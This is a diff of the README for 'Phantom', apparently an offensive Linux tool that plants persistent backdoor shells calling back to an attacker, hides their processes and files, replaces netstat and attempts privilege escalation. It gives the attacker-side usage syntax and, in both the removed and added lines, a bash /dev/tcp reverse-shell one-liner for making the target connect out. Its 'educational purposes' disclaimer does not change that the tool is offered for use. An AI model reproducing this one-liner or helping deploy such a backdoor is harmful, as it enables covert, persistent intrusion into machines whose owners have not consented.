konsaranto/phantom/README.md

 # Overview

 Phantom is a tool which creates backdoor shells from a target machine to an attacker's and hides their pid, persisting through reboots.
 It also hides the files needed to perform the above and replaces netstat.
+If needed it attempts privilege escalation.
 It only works on Linux machines.

 **Phantom was created for educational purposes.
 Stay away from illegal activities.**

 Phantom uses ncat on the attacker's machine to listen for incoming connections from the target's machine.
 At first it opens an ncat connection to a port (port1) and when the target's machine connects to this port it delivers the payload.
-The payload opens a new backdoor shell every 5 minutes to the attacker's machine, but to a different port than the first one (port2).
+The payload opens a new backdoor shell every minute to the attacker's machine, but to a different port than the first one (port2).
 The reason for this is that this way you have more control of what to do with the backdoor shell, otherwise the same payload gets executed each time the target connects to your machine.
-It also creates a python3 server listening to a third port (portp) that is needed to transfer the files needed by the payload.
-So, essentially, you have to specify three ports.
+It also creates a python3 server listening to a third port that is needed to transfer the files needed by the payload.
+Lastly, if privilege escalation is attempted, it opens another ncat process.

 ## Usage

 ```
-phantom-init [ip=][port1=][port2=][portp=]
+phantom-init [ip=][port1=][port2=]
 ```

 * ip: the attacker's ip (e.g. ip=127.0.0.1)
 * port1: the port that listens for connections to deliver the payload (e.g. port1=8888)
 * port2: the port that listens for the backdoor shells after delivering the payload
-* portp: the port that the python3 server listens to transfer the functions and variables needed by the payload

-You have to somehow make the target execute this code, so that he connects to port1:
-**bash -c 'bash &>/dev/tcp/ip/port1 <&1 &'**
-ip and port1 are the ones specified above.
+You have to somehow make the target connect to port1, i.e. bash -c 'bash &>/dev/tcp/ip/port1 <&1 &' ip and port1 are the ones specified above.

 ## Files